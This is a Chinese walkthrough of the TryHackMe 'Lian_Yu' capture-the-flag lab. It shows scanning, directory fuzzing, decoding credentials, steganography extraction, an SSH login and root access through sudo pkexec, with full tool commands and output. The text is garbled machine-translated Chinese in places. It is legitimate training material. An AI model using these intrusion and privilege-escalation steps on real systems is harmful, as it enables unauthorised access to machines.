免责申明

本文浸透的主机通过非法受权。本文应用的工具和办法仅限学习交换应用，请不要将文中应用的工具和浸透思路用于任何非法用处，对此产生的所有结果，自己不承当任何责任，也不对造成的任何误用或侵害负责。

服务发现

┌──(rootkali)-[~/tryhackme/Lian_Yu]└─# nmap -sV -Pn 10.10.174.43 -p-Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-04 05:22 EDTNmap scan report for 10.10.174.43Host is up (0.30s latency).Not shown: 65530 closed portsPORT      STATE SERVICE VERSION21/tcp    open  ftp     vsftpd 3.0.222/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)80/tcp    open  http    Apache httpd111/tcp   open  rpcbind 2-4 (RPC #100000)59642/tcp open  status  1 (RPC #100024)Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 3585.05 seconds

ftp尝试登录

尝试用anonymous和Lian_Yu登录ftp，显示Permission denied

┌──(rootkali)-[~]└─# ftp 10.10.174.43Connected to 10.10.174.43.220 (vsFTPd 3.0.2)Name (10.10.174.43:root): anonymous530 Permission denied.Login failed.ftp> bye221 Goodbye.                                                                                                                                                                                                                                            ┌──(rootkali)-[~]└─# ftp 10.10.174.43Connected to 10.10.174.43.220 (vsFTPd 3.0.2)Name (10.10.174.43:root): Lian_Yu530 Permission denied.Login failed.ftp> bye221 Goodbye.

咱们须要一个ftp的用户名

目录爆破

┌──(rootkali)-[~/dirsearch]└─# python3 dirsearch.py -e* -t 100 -w /usr/share/wordlists/Web-Content/directory-list-2.3-medium.txt -u http://10.10.174.43   _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 220545Output File: /root/dirsearch/reports/10.10.174.43/_21-11-04_05-23-21.txtError Log: /root/dirsearch/logs/errors-21-11-04_05-23-21.logTarget: http://10.10.174.43/[05:23:21] Starting: [05:24:57] 301 -  236B  - /island  ->  http://10.10.174.43/island/        [05:33:51] 403 -  199B  - /server-status   

关上/island页面，显示一段话：

<h1> Ohhh Noo, Don't Talk............... </h1><p> I wasn't Expecting You at this Moment. I will meet you there </p><!-- go!go!go! --><p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</style></h2>

vigilante是正确的ftp用户名，然而咱们不晓得明码

┌──(rootkali)-[~]└─# ftp 10.10.174.43Connected to 10.10.174.43.220 (vsFTPd 3.0.2)Name (10.10.174.43:root): vigilante331 Please specify the password.Password:530 Login incorrect.Login failed.ftp> bye221 Goodbye.

hydra爆了半天vigilante的明码，没有后果
看提醒是In numbers，后果是/island/ 下的2100文件夹

What is the Web Directory you found?

2100

2100文件夹下有一行正文：

you can avail your .ticket here but how?

持续爆破目录

看上去是要爆破.ticket 后缀的文件,用wfuzz

root@kali:~# wfuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 http://10.10.174.43/island/2100/FUZZ.ticketWarning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.********************************************************* Wfuzz 2.4.5 - The Web Fuzzer                         *********************************************************Target: http://10.10.174.43/island/2100/FUZZ.ticketTotal requests: 220560===================================================================ID           Response   Lines    Word     Chars       Payload                                                                                   ===================================================================                    000010444:   200        6 L      11 W     71 Ch       "green_arrow"   

关上/island/2100/green_arrow.ticket显示

This is just a token to get into Queen's Gambit(Ship)RTy8yhBQdscX

base58解密RTy8yhBQdscX失去：

!#th3h00d

用vigilante:!#th3h00d登录ftp，把所有文件下载到本地剖析

┌──(rootkali)-[~/tryhackme/lianyu]└─# ftp 10.10.174.43                                                                                                                                             130 ⨯Connected to 10.10.174.43.220 (vsFTPd 3.0.2)Name (10.10.174.43:root): vigilante331 Please specify the password.Password:230 Login successful.Remote system type is UNIX.Using binary mode to transfer files.ftp> ls -alh200 PORT command successful. Consider using PASV.150 Here comes the directory listing.drwxr-xr-x    2 1001     1001         4096 May 05  2020 .drwxr-xr-x    4 0        0            4096 May 01  2020 ..-rw-------    1 1001     1001           44 May 01  2020 .bash_history-rw-r--r--    1 1001     1001          220 May 01  2020 .bash_logout-rw-r--r--    1 1001     1001         3515 May 01  2020 .bashrc-rw-r--r--    1 0        0            2483 May 01  2020 .other_user-rw-r--r--    1 1001     1001          675 May 01  2020 .profile-rw-r--r--    1 0        0          511720 May 01  2020 Leave_me_alone.png-rw-r--r--    1 0        0          549924 May 05  2020 Queen's_Gambit.png-rw-r--r--    1 0        0          191026 May 01  2020 aa.jpg

剖析

aa.jpg的照片放到谷歌图片搜寻里显示人物叫Slade Wilson，如同是一个超级英雄的名字

.other_user里讲了Slade Wilson的故事

咱们猜想Slade或者Wilson会是ssh的登录账号

Leave_me_alone.png是一张坏了的png照片
Queen's_Gambit.png是一张失常的png照片

咱们用sublime2关上Leave_me_alone.png,把第一行的
5845 6fae 0a0d
替换成
8950 4e47 0d0a
修复这张png图片，图片显示了一个明码：password

用这个明码析出aa.jpg的暗藏文件

┌──(rootkali)-[~/tryhackme/lianyu]└─# steghide extract -sf aa.jpgEnter passphrase: wrote extracted data to "ss.zip".

解压后失去两个文件passwd.txt和shado：

┌──(rootkali)-[~/tryhackme/lianyu]└─# cat passwd.txt This is your visa to Land on Lian_Yu # Just for Fun ***a small Note about itHaving spent years on the island, Oliver learned how to be resourceful and set booby traps all over the island in the common event he ran into dangerouspeople. The island is also home to many animals, including pheasants,wild pigs and wolves.                                                                                                                                                                       ┌──(rootkali)-[~/tryhackme/lianyu]└─# cat shado     **********

what is the file name with SSH password?

shado

拿到初始shell

┌──(rootkali)-[~/tryhackme/lianyu]└─# ssh slade@10.10.174.43     slade@10.10.174.43's password:                               Way To SSH...                          Loading.........Done..                    Connecting To Lian_Yu  Happy Hacking██╗    ██╗███████╗██╗      ██████╗ ██████╗ ███╗   ███╗███████╗██████╗ ██║    ██║██╔════╝██║     ██╔════╝██╔═══██╗████╗ ████║██╔════╝╚════██╗██║ █╗ ██║█████╗  ██║     ██║     ██║   ██║██╔████╔██║█████╗   █████╔╝██║███╗██║██╔══╝  ██║     ██║     ██║   ██║██║╚██╔╝██║██╔══╝  ██╔═══╝ ╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗███████╗ ╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚══════╝        ██╗     ██╗ █████╗ ███╗   ██╗     ██╗   ██╗██╗   ██╗        ██║     ██║██╔══██╗████╗  ██║     ╚██╗ ██╔╝██║   ██║        ██║     ██║███████║██╔██╗ ██║      ╚████╔╝ ██║   ██║        ██║     ██║██╔══██║██║╚██╗██║       ╚██╔╝  ██║   ██║        ███████╗██║██║  ██║██║ ╚████║███████╗██║   ╚██████╔╝        ╚══════╝╚═╝╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚═╝    ╚═════╝  #slade@LianYu:~$ whoamisladeslade@LianYu:~$ iduid=1000(slade) gid=1000(slade) groups=1000(slade),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),115(bluetooth)

在当前目录拿到user.txt

提权

查看以后用户的sudo权限，间接能够用pkexec提权

slade@LianYu:~$ sudo -l[sudo] password for slade: Matching Defaults entries for slade on LianYu:    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser slade may run the following commands on LianYu:    (root) PASSWD: /usr/bin/pkexec

提权到root

slade@LianYu:~$ sudo /usr/bin/pkexec /bin/sh# id   uid=0(root) gid=0(root) groups=0(root)# whoamiroot# cat /root/root.txt